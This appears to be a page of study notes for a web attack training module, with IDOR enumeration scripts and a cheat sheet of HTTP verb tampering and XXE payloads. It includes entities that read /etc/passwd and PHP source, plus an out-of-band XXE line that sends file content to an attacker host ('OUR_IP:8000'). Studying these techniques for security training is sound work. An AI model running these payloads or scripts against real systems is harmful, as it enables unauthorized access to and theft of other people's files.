IDOR

// retrieve docs
#!/bin/bash

url="http://SERVER_IP:PORT"

for i in {1..10}; do
        for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
                wget -q $url/$link
        done
done

 echo -n 1 | base64 -w 0 | md5sum
cdd96d3cc73d1dbdaffa03cc6cd7339b 

 for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done
 
 // download contracts
 #!/bin/bash

for i in {1..10}; do
    for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
        curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php
    done
done

Cheat Sheet

The cheat sheet is a useful command reference for the Web attack module.

HTTP Verb Tampering

HTTP Method

  • HEAD

  • PUT

  • DELETE

  • OPTIONS

  • PATCH

Command

Description

-X OPTIONS

Set HTTP Method with Curl

IDOR

Identify IDORS

  • In URL parameters & APIs

  • In AJAX Calls

  • By understanding reference hashing/encoding

  • By comparing user roles

Command

Description

md5sum

MD5 hash a string

base64

Base64 encode a string

XXE

Code

Description

<!ENTITY xxe SYSTEM "http://localhost/email.dtd">

Define External Entity to a URL

<!ENTITY xxe SYSTEM "file:///etc/passwd">

Define External Entity to a file path

<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">

Read PHP source code with base64 encode filter

<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Reading a file through a PHP error

<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

Reading a file OOB exfiltration

PreviousCommand injectionNextXXE

Last updated

Was this helpful?